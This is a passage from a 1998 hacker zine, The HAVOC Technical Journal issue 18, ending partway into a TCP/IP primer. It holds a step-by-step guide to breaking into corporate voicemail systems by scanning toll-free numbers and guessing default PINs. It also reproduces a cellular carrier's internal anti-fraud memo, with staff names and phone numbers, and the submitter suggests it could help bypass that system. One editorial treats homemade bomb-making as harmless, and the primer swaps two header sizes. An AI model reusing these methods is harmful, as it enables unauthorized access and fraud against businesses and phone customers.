Copy Link
Add to Bookmark
Report

The Havoc Technical Journal 18

  


. .
. . . ,g$p,
.,. $&y .,. `"`
oooy$$$yoo o oooy$$$yoo o
. `$$$'$$$yyyyp,`$$$' gyp . .
. yxxxx $$$ $$$"
`"$$$ $$$ $$$ xxxxxxxxxxxxxxy . volume 2
$ $$$ $$7 ly$ $$$ $$$ $ number 6
$ $y$ $$b d$$ $y$ $y$ $ issue 18
. $xxxx $$$ $$$ $$$ $$$ $$$ xxxxxxxxxxxxxx$ .
. """
""" """ """ $$' .
t h e h a v o c $$' t e c h n i c a l j o u r n a l
[January 1, 1998..................$'...........................Happy New Year]
[......................'Putting the hell back in shell'......................]

[Table of Contents...........................................................]

Contacts & Copyrights......................................Staff
Editorial..................................................scud_
The Way It Should Be.......................................shoelace
Bringing Back the Old School...............................Revelation
Hacking VMB Made Easy......................................SSS
Fraud Force System.........................................D-Day
An Introduction to the Internet Protocols..................scud_
Windows NT Vulnerability Theories Version 2................vacuum
Basic Network Architecture, Part II........................lurk3r
blast.c....................................................memor
sendmail885.c..............................................su1d
sendmail885.c (2)..........................................scud_
Scripting in UNIX..........................................Nartrof
ttyread.c and ttywrite.c...................................simon
The Mailroom...............................................scud_
The News...................................................KungFuFox
Reader Survey..............................................Staff

---->NEW Majordomo<----
Subscribe to thtj at: majordomo@orc.ca 'subscribe thtj you@your.isp'


[Contacts & Copyrights..................................................Staff]


[1. Contacts]
Editor in Chief : Scud-O, <scud@thtj.com>
Executive Editor : KungFuFox,
Submissions Editor : Keystroke,
Editing Assistants : FH, Phrax,
News Editor : KungFuFox,
Mail Editor : Scud-O,
Webpage Editor : Scud-O,

Extra Special Thanks : All the writers, and people who filled out
the reader survey.

Shout Outs : All of you in the know.


THTJ Website : http://www.thtj.com/
THTJ e-mail : thtj@thtj.com, scud@thtj.com

[2. Copyrights]

The HAVOC Technical Journal (THTJ) Volume 2, Number 6, Issue 18
January 1st, 1998. *Everything* here is (c) Copyright 1996,1997,1998
by THTJ, HAVOC Bell Systems Publishing, or HNS. All Rights Reserved.
Nothing may be reproduced in whole or in part without written permission from
the Editor in Chief. The articles included here, belong to their writers and
articles are copyrighted by their writers. If you want to use their articles
in your publication, ask them. For more information on our copyrights, and
article submissions policy, please see http://www.thtj.com/submissions.html
For more information on legal stuff goto http://www.thtj.com/legal.html
[No copying THTJ, damnit.]


Articles, comments, whatever should be directed to: scud@thtj.com
Subscribe to thtj at: majordomo@orc.ca 'subscribe thtj you@your.isp'

Disclaimer:
THTJ is provided free of charge, thus THTJ provides NO warranties
whatsoever. You use this zine and its information at your own risk.
While every effort has been taken to ensure the accuracy of the
information contained in this article, the authors, editors, and
contributors of this zine assume no responsibility for errors or
omissions, or for damages resulting from the use of the information
contained herein.


The HAVOC Technical Journal does in no way endorse the
illicit use of computers, computer networks, and
telecommunications networks, nor is it to be held liable
for any adverse results of pursuing such activities.
[Actually, to tell you the honest to goodness truth, we
do endorse that stuff. We just don't wanna get in trouble
if you try it for yourself and something goes wrong.]

-------------------> 'Its Not Our Fault' <-------------------

THTJ is protected by the First Amendment of the US of A. If any of the
information contained in this file offends you, then why the hell are
you reading it?

THTJ publishes its information to educate you, if YOU choose to use the
information illegally, so be it. We are not responsible for *YOUR* actions.
We merely provide the information. By reading this zine, you agree to this
policy, and you void all rights to sue us or get us involved in the
consequences of *YOUR* actions. If you can not deal with this policy, then
delete this file now.

Stealing articles, or pieces of articles, or pieces of pieces of articles
from thtj with out permission is a crime against humanity. If you want to
use any of the material in here, please contact THTJ and/or the articles
author. If you do not follow these rules, we may be forced to take legal
action.

NOTICE: if you are a government offical or employee reading this file, you
MUST register with thtj. A registration permit will be mailed to you free
of charge by using either of the mail addresses above. A Registration fee
of $50 is required upon submission of the permit. This will entitle you to
recieve thtj via a private mailing list, or via snail mail on a 3.5 floppy
disk. UNTIL you are officially registered, you MUST DELETE ALL COPIES of
thtj that you have, either in print or on a computer. You CAN NOT read thtj
until you are registered. This is *NOT* optional. If we detect .gov access
from an unregistered person, we will have to take legal action.




[Editorial..............................................................scud_]

Ladies and gentlemen, boys and girls, feast your eyes on the new look
of thtj. This will probably be the look for use for the new few issues, unless
you mail us and say that you are going to kill us all because we aren't good
at ASCII. We are still going to be playing around with this format a bit, so
your comments can help.
I would like to take some time out and address all of the reader
surveys I have recieved. To the hundreds of you that replied, I thank you for
your input, and I hope that the rest of you out there follow the lead of these
people and fill out the survey. Those of you that did fill it out last month,
feel free to fill out the form again and tell us how we are progressing.
A few of you that replied were sysadmins, and most of you said that you wish
that hackers understood that most of these sysadmins are hackers just like you
and me. This is an important point. Many sysadmins out there are a hundred
times better at hacking than alot of the hackers out there. Some sysadmins are
not really hackers and they hate hackers, thus messing up the rep for all
sysadmins. Alot of you also asked if I was interested in articles. The answer
is YES! thtj lives off of the articles that you all submit to us. If it wasn't
for all of you out there that submit articles, thtj would have dried up a long
time ago. So, please help keep this zine going by submit articles to it. If
you would like to submit an article, please send it to me at scud@thtj.com.
I will look the article over, and will try to get back to you, but if I don't,
then the article eihter will or will not be in the next issue of thtj. Well,
I must get back to the Festivus and the feats of strength, so I will not be
able to write a real important editorial this month, but go on and read
shoelace's bickerings below.

[The Way It Should Be, Dammit........................................shoelace]

Alas, yet another lame article but shoefunk (yes, that is also
Shoelace). This one is about how stupid the world really is when it comes
to computer's, hacking, phreaking, bomb making, well, just about anything.
Recently, I was reading the 'Time Digital: Your Guide To Personal
Technology"
, and came across a small dictionary page, where they defined a
hacker as.. "HACKER: A good guy gone bad. In the early days of computing,
the term was applied to enthusiastic, Jolt cola-swilling programmers who
lacked formal training. Increasingly, though, hacker refers to a kind of
high-tech, disgruntled postal employee--one who breaks into and crashes
corporate and government databases for the sheer hell of it--and for a little
recongnition too."
Although this is in some cases true, I see more cases
of people doing it to prove a point. Rather it's to prove that they can do
something, or to let their oppinion out about something, the common 'hacker'
will do the 'hack' for probably more than just the sheer hell of it. You
should always try to prove a point with what you do, even if the point isn't
gonna happen. It get's out faster, and more people will find out about it.
Next subject; phreaking. I don't know about you people out there,
but why is it that if you can set up a teleconferance, that you are elite?
I don't get it.. just because you can go down to a local pay-phone and dial
up ATT Voice Conferancing, post the information, and talk to people, that you
are really, really, really super. I'm not saying that a conf. isn't nice
now and then, and that when someone set's it up, that you don't thank them,
but why worship them? It's just a conf. Why not take apart your phone and
see why it works instead of bribing someone that if they set one up, they will
be rewarded? It's much more gratifing to go and see why something work's,
rather than to charge major cost to someone else. So go unscrew your phone
and pry it open.
Also, what do people think making a pyrodex bomb is gonna do? Just
because you have a lbs. of pyrodex in your room, doesn't mean your gonna
blow up another Oklahoma Municiple Building type explosion. People should
stop worrying about having fireworks and homemade explosions. My friend's
and I make lot's of bombs, and have yet blown up buildings or anything. It's
just something to do.
So enough of all the bitching about Hacking/Phreaking/Bomb's.. just
let whatever's gonna happen, happen. Let bomb's go boom, PLEASE let phreaking
become about understanding phone's and why things happen, and for hacking,
prove a point about why you do something. And for shoelace, shut up already.

-shoelace (shoe@beer.com) (http://www.public.usit.net/sltaylor)
-IRC: undernet - #terrorism, #deathmetal, #phreak

[Bringing Back the Old School......................................Revelation]

0000000000000000000000000000000000000||
0 0||
0 BRINGING BACK THE OLD SCHOOL II 0||
0 By 0||
0 Revelation 0||
0 Hackers.Com 0||
0 0||
0000000000000000000000000000000000000||
|||||||||||||||||||||||||||||||||||||


Many of you may have read my article "Bringing Back The Old School"
in THTJ #12. It got a huge response and so I decided to write a followup on
it, with more of my views and ideas on what the underground is becoming and
what it should be. If you haven't read my previous article, I strongly
suggest you do as a prelude to this.
The Internet was created to be a free place. A place where people can
learn about anything and everything. Yet another tool that will change
society for the better. But, there are always rebels. Rebels do as they
please and refuse to abide by given rules that confine their hunger for
knowledge. The Internet rebels gathered in a non-physical arena known as the
underground. The underground is composed of hackers and phreaks and anyone
with an interest in technology and the determination to learn as much as
possible, regardless of the obstacles. What is life about anyway? In my
opinion, it's about learning. What else is there? There are material things
that occupy most of our time, but what's it all for? Nothing. The only real
thing is knowledge. Someone with the determination to learn all they can
regardless of the obstructions is a great asset to society in general. These
are the people who create things that make life easier to live. These are the
people who theorize and ponder about all that exist, simply because they
want to. Knowledge is not a tangible thing, thus it cannot be taken away.
There are many mediums used for the study and passing of knowledge, the
computer is just one of them. Some people choose books, others television or
radio, we choose the computer.
Hackers have gotten a distorted image for various reasons which I'm
not going to go into, because what's done is done. Hackers originated as
highly skilled computer programmers, and that eventually got distorted into
computer criminals. Now, we are neither. What we are is information seekers.
We just want to learn about all we can, because that's all that really
matters in the long run. We want to learn about not only computers, but
telephones, technology, government, the world in general, and life. We
choose to pursue this knowledge by any means necessary, and on occasion, that
may violate a law or two, but we hurt no one, we harm nothing. We are not
criminals. As soon as the public understands that we will finally be taken
for what we are: people wanting to learn.
Knowledge is taken for granted these days. The underground has lost
its sense of ethics, the ethics of knowledge seeking and non-destruction that
I described above. The underground has become polluted with software pirates,
email bombers, carders, virus spreaders, and anarchists. We must pull away
from those things that corrupt the underground now, or they will eventually
corrupt us few who still believe in the true underground. These unethical,
immoral, and just plain stupid things must be stopped. And stopping them
is easy, but getting everyone to cooperate is not. We can stop these things
by simply refusing to distribute the files that teach these things, because
if you stop the flow of the unethical information, people will turn to the
ethical because it's all that's left. Simply refusing to link to sites that
distribute these files will help too. So that's all you have to do to help
me and Hackers.Com realize our idea of the New School, a return of the Old
School ethics, simply deny the information that is corrupting the underground.
Now, some of you may be thinking: "He stated that all information
should be free and that all hackers want is to pursue information, but then
he stated that we need to stop the flow of information. This doesn't make
sense."
Well, actually, it does. I understand what you're thinking, but you
must try to understand what I'm thinking. We choose to pursue pure knowledge
for the simple gain of more knowledge, nothing else. We get no material gain
from our desire to learn. But, those who pirate software, card, etc. are
gaining finances and causing destruction at the same time. I want to stop
the flow of information that does nothing but damage, because this is not
the information which we want to pursue. We want to pursue the information
that creates knowledge, not destroys or corrupts it. It is easier to destroy
than to create, but creating is much more rewarding.
So this is it...this is a major step towards realizing our dream
of freedom, greatness, and ethics among the underground population. Our
determination to get rid of software pirates, carders, virus spreaders,
and anarchists who do nothing but destroy, will overcome them...it's just a
matter of time.
I hope that the things I have discussed in this and my previous
article are of some help to you in the underground and in life. Please study
the things I have written, and think about them, and help me achieve the goal
that I share with every other true hacker out there...bringing back the old
school. If you wish to further discuss these topics with me, or just comment
on my article, you can do so by emailing me at: revelation@hackers.com
Or if you'd like more information on my ideas and my quest to bring back
the Old School, you may visit my web site at: www.hackers.com
There you will find informational resources for the true hacker, and it will
change your life forever. I will never give up...I hope the same is true for
you.

Written By:

Revelation
Hackers.Com
revelation@hackers.com
"Bringing Back The Old School"

[Hacking VMB Made Easy ...................................Super Sharp Shooter]
(mdma@cyberus.ca)
(12/21/97)

Voice Mail Boxes (VMB) I would say is the best way to keep in touch, give
info, or just say hi to someone other then email. But the fun thing with
VMB's is that most of them are 1-800's and you can call them up or check
them from any payphone (for free!) or ANY where in the world.

How do VMB's work?
VMB's are basily computer systems, with passwords, menus, users, with
permissions, and so on. But it is all done by voice and DTMF tones. Just
like computer systems, there are many different VMB systems out there,
some stronger then others, some not. Think of a answering machine, but all
digital and hundreds of them on a box.

First step is finding a VMB system, there are hundreds of 1-800 VMB out
there waiting to be hacked. Pick up a phone (a speaker phone works the
best) and start hand-scanning, 1800-111-0001, 0002, 0003, and so on. You
should only hand-scan after bussiness hours. The best ones are small
bussiness, when you get to one (after hours) you should hear something
like "Hello welcome <blah, blah blah> if you know your parties ID box
number (or pid or ext.) you may dial it now."
BINGO, you got one. Try out
all the menu's and get a feel for the system.

Ok I found a VMB system now what?
First you have to get to the VMB system (after all this is a computer not
only running VMB's), most of the time its '#' or '*' as soon as you hear
the MAIN welcome message of the company. Next you have to know how long
the box numbers, you can find this out by going to the main menu and you
should hear something like, "If you want you hear the directury of people
(users) press #"
hit # and listen to the listenings. Example "John Doe box
546....Jonny Down box 538"
and so on. Most systems have 3 digits long
boxes, and the super-user usally places the users in groups like 2XX for
marketing section, 6XX for accounting and so on, so listen and write down
all the groups when listening to the directiry list. If you hear that the
2xx's group are active listen to the last box number in the group and
right it down. Most of the time sysadmins add extra boxes so they cam add
users to the group. The extra ones will be your target, why? Well its
easyer to hack into, and when you get one it will take a lot longer for
the sysadmins to find out that you hacked a box on the system. The main
goal is too find an EMPTY box, after you found an empty box, the next step
is the longest and you need luck. All VMB systems have default settings,
for example when you set up a box (as the sysadmin) the passwd could be
the same as the box number, ie: box 123, passwd 123. First you have to
find length of the passwd, you can do this by putting in the box number
first then it will ask you for the passwd (or pin number) first press the
1 button (doesnt have to be the one button) then wait a few secs, then
2..wait....then 3...wait keep doing until the lady says "Wrong Pin Number,
please try again!"
Just make sure you do it slow. Now that you know the
passwd length here are some common defaults you should try first:

1) same box passwd -=- box is 902 try 902 for passwd
2) reverse passwd -=- box is 902 try 209 for passwd
3) add 1,2,3+ passwd -=- box is 902 try 9021 for passwd, 9022, 9023, etc.
4) Year passwd -=- 1997, or 1998 whatever year we are in

More:
_4 digit passwd_ _5 Digit Passwd_ _6 Digit Passwd_
0000 00000 000000
1111 11111 111111
2222 22222 222222
3333 33333 333333
4444 44444 444444
5555 55555 555555
6666 66666 666666
7777 77777 777777
8888 88888 888888
9999 99999 999999

And the list goes on and on.....just use your head. Try shit like 1234,
4321, and just look at your telephone keypad and look for patterns.
Just dont give up.

I GOT ONE!! Now what?
Once you get into a box you will hear a number of menus, the first thing
you should do is check to see if there are any new or saved messages on
the box, if so listen to them and pay attention to the date of the
message. If you have found an empty box you dont have to worry about this,
but if you hacked into someone's box this is important. If the dates on
the messages are old (ie: 1+ months) then there is a good chance that your
new box will not get killed, but if the messages are a few days (or hours)
old then dont fuck with anything and try to hack a new box. If you screw
with that box like delete messages, change passwd on the box, the owner
will tell the sysadmin and you will lose it anyways, and then the sysadmin
how hackers are trying to break into the system.
Once you feel that the box you have is safe, its up to you what to do.
Change the voice greeting message, passwd, some VMB systems have wake up
calls, which is wicked, think about it, you can put ANYONE's phone number
in and time (ie: 4:00am) in North America to wake them up, or piss them
off. Just look around on each menu so get a feel for it.

Most of the time sysadmins are box number 999, 998. So if your lucky and
can hack a sysdmin box you can make new groups, new boxes for all your
friends. If you do hack the sysadmin box just make a few boxes and leave,
dont change the sysadmin's passwd or delete any messages.
Play Safe, and Have Phun.

Super Sharp Shooter -+- 1.800.234.1136 BOX 999

"Phreaking For Phun"
http://www.cyberus.ca/~mdma/phreak
NPA 613

[Fraud Force System.....................................................D-Day]

Century Cellunets New "Fraud Force System"
Technical Interoffice Data

People in the Baton Rouge,New Orleans Lousiana and surrounding
towns may find some use in the following file. It douments the structure
of the "Fraud Force" System being implemented into these locations cell
sites and switches. It is unknown if it will affect landline systems,but
from the way it works,it is doubtful.

EOC---------------------------------------------------------------------EOC

Interoffice Memorandum
Date:Febuary 18,1997 File:FRAUDFOR
To:Div/Dist Managers
Office Managers
Chris Nolen
Barry Gugliuzza

FROM: Phyllis May
SUBJECT: Fraud Force Use In Fraud Markets

Laura Graham developed the following procedure for the Customer Service
Center to be used when customers are using the phones in high fraud markets
where Fraud Force has been implemented.

The following details are unique to Region 1 and the Force implementation.

Fraud Force will start with the Baton Rouge system the week ending
Feb 28. Other markets will be added as needed.

All Louisiana,Arkansas and Texarkana cellulars in this sytem will be
routed through Fraud Force.

Calls will be routed to Customer Service.

Please direct any questions to Jim Burnham at 318/683-3429 or Rhonda Woodard
at 318/683-3427.
(page 2)
Overview:

Purpose: FraudForce is a system implemented by Century,to help combat cloning
fraud for our customers roaming in high fraud areas. Affected markets will
be included as needed,those which are found to have high fraud rates.
(page 3)
Following is an overview of the verification process for Century customers
using cell service for the first time in a FF market. For detailed
instructions,see "Verification Process"

Step| Action
1.Customer places first call to any number.

2.Call is routed (hotlined) to FraudForce,where an Interactive Voice Response
(IVR) prompts the user to enter their 10 digit cell number,which is verified
ending with the pound key. The customer has three (3) tries to enter their
number correctly.

3.Call is transferred to Century Cellunet's customer service center.
-Valid customers will contimue to step 4
-Invalid customers are instructed to make another call and
re-enter the correct cell number.

4.The customer information is verified to confirm the cell user is valid.
- ------------------------ -----------------------------------------
|If Information Is | The CSR |
----------------------------------------------------------------------
| verified, | explains the call credit and |
| | procedure to establish PIN. Go to step 5|
|-------------------------- ------------------------------------------
| not verified, | presses 0 on their keypad to transfer to|
| | a recording explaining the caller is |
| | denied. |
|__________________________|_________________________________________|

5.The CSR presses 1 to transfer the call to the FraudForce IVR,and the
customer interactively uses their phone keypad to establish a 4 digit PIN.

6.If a billed call,the CSR notes the length of the call and credits the
customers account(length of call X roaming airtime rate) to AFDFC. This
is because the customer incurred airtime charges during verification and
PIN selection.

(page 3)
ESTABLISHING AND USING A PIN

Hours accesible: Any normal working hours. Customers after hours will be
directed to call during normal hours.
Call types: There are two types of FraudForce calls.

Fraud Force 1 These are calls where the customer entered a valid 10
------------- digit cell number when prompted after the inital hotline.
There are customers who had previously established a PIN,
however entered it incorrectly and must repeat the
verification process,or are making their first call in the
FraudForce market verifying for the first time.

Fraud Force 3 These are calls where the customer entered an invalid 10
------------- digit cell number or pressed zero (0) for assistance.(the
customer has three tries to enter their cell # correctly.)

The customer can not be verified without entering a valid
10 digit number. They are instructed to attempt the call
again,so they recieve the IVR prompts to enter the 10
digit number correctly.

PIN DETAILS: The PIN is four digits and should not start with zero.

The PIN is not accesable to Century. The customer must
remember their PIN.

Once established,the PIN is valid in that market until Century
removed it and the customer calls the IVR to establish a new
one. This can be done if the user forgets their PIN or if the
usage/user appears to be fraudulent and Century needs to block
service.

A PIN must be established in each FraudForce market. The same
PIN may be used in every FraudForce market,or different PINs
may be used.

Different customers MAY have the same PIN.

The customer will periodically be asked to enter the PIN
before making a call.

A user has 3 tried to enter the PIN correctly. On the 4th
try,the call will be directed to Fraud Force 1.

(page 4)
VERIFICATION PROCEDURES
The following are the procedures for a FraudForce 1 call.

1.Customer first places call to any number.
2.Caller is hotlined to FraudForce,where an IVR prompts the user to enter
their 10 digit cell phone number and the pound key.
3.When entered correctly,the call is transferred to Century's customer
service center,with the following introduction "Please verify your 10 digit
cellular number. Press any key to accept this call."

4.The CSR presses any key on their phone to accept the call and says to the
caller,Century Cellunet,This is (name) You are currently roaming in a high
cellular fraud area. For your protection and ours,will you verify some
account information to enable you to establish a Personal Identification
Number,or PIN.
5.Important:Customer information must be verified to confirm the account
holder,secondary authorization holders,or buisiness account cellular
users are valid before given access to establising a PIN.

Individal Accounts:
What city are you currently in?
What is your mobile number?
What is your name?
If user differs from account name,What is the name on the account?
What is your Social Security Number?

If the Social Security number is not verified,verify one of the following:
What is the account's billing address?
What is your home phone number?
What is your work number?

Business Accounts:
What city are you currently in?
What is your mobile number?
What is your name?
What is the account name?
What is the accounts billing address?

The general billing address is okay,if not verified at all (customer does not
know)verify the following:
What is your work phone number?
(page 5)
If information is verified:
Thank you for your cooperation.
If a billed call-You will recieve credit for this call.
If a free call-This is a free call.

I am now returning you to the system so you can set up your PIN.

The CSR presses 1 on their keypad to transfer to the FraudForce IVR to
establish their PIN.

If Information is NOT verifed:
I am unable to authorize the information you have given;and presses 0
on their keypad to transfer the call to a recording explaining the call
is denied. (no dont give out account information)

7. The CSR tickles the cutomers account using an action code of PENDF.
Include the 1- digit cellular number,FF,whether or not the customer
was verified.

(page 6)(End of Memo)

I would have typed the rest of this file,but its just basically a list of
customers questions and alternate places for the caller to be transferred.
Nothing you pretty much need to know about the system,but if you keep a copy
of this on hand,you may be able to bypass. You have what the operator is
looking at,you know what shes going to do. Use this information,dont flaunt
it. Century is a good corporation,but sometimes you need a cell! Remember,
if updates to this file are made,I will be sure to send them out to the
public.


UPDATE: I have just discovered that FraudForce is now being implemented in
almost all cities around the country that use Century. Now this is a serious
problem.



[An Introduction to the Internet Protocolos.............................scud_]

It seems that everyone is covering this topic for an article, so I
figured that it was high time that I toss my hat into the ring and muck
things up a bit more. This is merely and introduction, so I am not going to
go into the formats for TCP and UDP headers and packets, well at least not in
this version of this document. TCP/IP and all of the other Internet protocols
take up whole books (and volumes of books) to fully explain. If you want to
learn more, check out the local B&N or Borders, and pick up a book on TCP/IP.

[ Editor's Note: The deadline for this issue came up too fast, so I
was unable to finish this whole text. There is still a good into to TCP and
UDP, so read it, and next month I will hopefully complete this Introduction
with the rest of the gang of Internet Protocols.]

The Internet is the world's busiest and the only true worldwide
network for all types of computers and people to use. What follows is an
Introduction to the protocols that make the Internet work.

There are a wide range of protocols that the Internet uses to connect
to other computers all over the world. However, since the Internet was
started on UNIX, the UNIX standards of networking are what the Internet
mainly uses to connect computers together. The UNIX protocols are often
referred to as TCP/IP for Transmission Control Protocol/Internet Protocol.
This is really in two parts, the TCP is an upper layer for data transport,
and the IP is a lower level network layer, but more on this in a bit.
Although several other methods are used for other services, TCP/IP is the
most commonly used protocol grouping, so we will cover TCP/IP first.

Before we delve into TCP/IP, we must first understand the model that
the Internet's protocols are developed on. Welcome to OSI.

-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
OSI - The Open Systems Interconnect Reference Model
-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


The Open Systems Interconnect (OSI) Reference Model was part of a
project by the International Organization for Standardization (ISO). The
ISO OSI network protocol architecture scheme never really caught on, but the
TCP/IP protocol uses the basic groundwork that OSI started. The model
consists of 7 layers, with each layer building on the layers below it, and
providing specific functionality. Each layer has its own unique
characteristics, and as a whole, the OSI model enables network communication.
The software implentation of such a layered model is appropriately termed as
a protocol stack.

User applications insert information into one layer and each layer
specially encapsulates the data until the bottom layer has been reached, and
this physical layer moves the data down the line to its destination,
occasionally having the layers translated from the bottom up as the data is
transported.

The OSI Model looks like below:

ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ 7. Application Layer ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ 6. Presentation Layer ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ 5. Session Layer ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ 4. Transport Layer ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ 3. Network Layer ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ 2. Data Link Layer ³
ÃÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ´
³ 1. Physical Layer ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

The layers have specific roles as I have said, each refraining from
intruding into the domains of the other layers. The Units exchanged are the
units of information that is passed in that layer.

o Application Layer: Contains the network applications with
which people interact, such as mail, ftp, rlogin, etc.

Units exchanged: message

o Presentation Layer: Creates common data structures.

Units exchanged: message

o Session Layer: Manages connections between network
applications.

Units exchanged: message

o Transport Layer: Ensures that data is recieved exactly as
it was sent.

Units exchanged: message

o Network Layer: Routes data through various physical networks
while traveling to a known host.

Units exchanged: packets

o Data Link Layer: Transmits and receives packets of
information reliably across a uniform physical network.

Units exchanged: frames

o Physical Layer: Defines the physical properties of the
network, such as voltage levels, cable types, interface pins
and other such fun things.

Units exchanged: bits

-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
The TCP/IP Network Model
-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

The OSI model informs an understanding of the TCP/IP communication
architecture. When TCP/IP is viewed as a layered model, there are usually
4 layers that are seen to compose TCP/IP:

o Application
o Transport
o Network
o Link

As with OSI, each TCP/IP layer has its own unique job:

Applications Layer: Network applications depend on the definition of
a clear dialog. In a client-server system, the
client application knows how to request something,
and the server knows how to respond to that
request. Examples of this include FTP, HTTP, etc.

Transport Layer: The transport layer allows network applications to
obtain messages over clearly defined channels and
with specific characteristics. The two protocols
within the TCP/IP suite that generally implement this
layer are TCP (Transmission Control Protocol) and
UDP (User Datagram Protocol).

Network Layer: The network layer allows information to be transmitted
to any machine on the contigous TCP/IP network,
regardless of the different physical networks that
intervene. The Internet Protocol (IP) is the common
mechanism for transmitting data within this layer.

Link Layer: The link layer consists of the low level protocols used
to transmit data to machines on the same physical network.
Protocols that are not part of the TCP/IP suite, such as
Ethernet, Token Ring, FDDI, ATM, etc. implement this layer.


A 2 system TCP/IP connection would look something like below:

System 1 (client) System 2 (server)
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Application ³ ³ Application ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Transport ³ ³ Transport ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Network ³ ³ Network ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ Physical ÚÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
³ Data Link ³<------------------------------------------>³ Data Link ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ Network ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

Data within these layers is usually encapsulated with a common
mechanism; protocols have a header, identifying meta-information such as
the source, the destination, and other important attributes, and a data
portion that contains the actual information. The protocols from the upper
layers are encapsulated within the data portion of the lower ones. When
traveling back up the protocol stack, the information is reconstructed as
it is delivered to each layer.

ÚÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄ¿
Application Layer: ³ Header ³ Data ³
ÀÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄ¿
Transport Layer: ³ Header ³ | Data ³
ÀÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
Network Layer: ³ Header ³ | Data ³
ÀÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
ÚÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿
Link Layer: ³ Header ³ | Data ³
ÀÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ

For example, a 200 byte TFTP packet using UDP/IP over Ethernet
might look a little something like:

ÚÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄÄÄÄÄÂÄÄÄÄÄÄÄÄÄÄ¿
³ Ethernet ³ IP ³ UDP ³ TFTP ³ Data ³ Ethernet ³
³ Header ³ Header ³ Header ³ Header ³ ³ Trailer ³
ÀÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÄÄÄÄÁÄÄÄÄÄÄÄÄÄÄÙ
(bytes) 20 14 8 4 200 4

This adds up to a total Ethernet frame size of 250 bytes.

-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
The TCP/IP Protcols: The Internet Protocol (IP)
-ÄÄ-ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

